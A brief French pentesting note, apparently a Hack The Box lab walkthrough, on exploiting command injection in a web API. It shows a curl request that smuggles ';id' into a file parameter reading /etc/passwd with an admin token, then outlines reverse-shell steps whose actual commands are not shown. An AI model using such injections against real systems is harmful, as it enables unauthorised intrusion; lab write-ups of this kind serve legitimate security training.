Abus d'API (RCE) - Pentesting Web
Vulnérabilité RCE:
Voici un exemple de commande curl qui tente d’injecter id:
curl -s -X GET "http://secret.htb:3000/api/logs?file=/etc/passwd;id" -H "auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2NzIxZjE5ZmQ4YWMzZTA0NjMxZjc4NmQiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRoLndvcmtzIiwiaWF0IjoxNzMwMjc4MTIzfQ.9YpH72pzpIjqRjc8EYBKhjLgmwjhetzpbDfVgXDzQi8" | jq
Nous allons exécuter un reverse shell :
Créez un fichier
index.htmlsur notre machine et créez un serveur web avec le contenu suivant :
Ensuite, mettez-vous à l'écoute sur le port 4444 :
Exécutez une injection avec curl sur notre serveur web :

Mis à jour
Ce contenu vous a-t-il été utile ?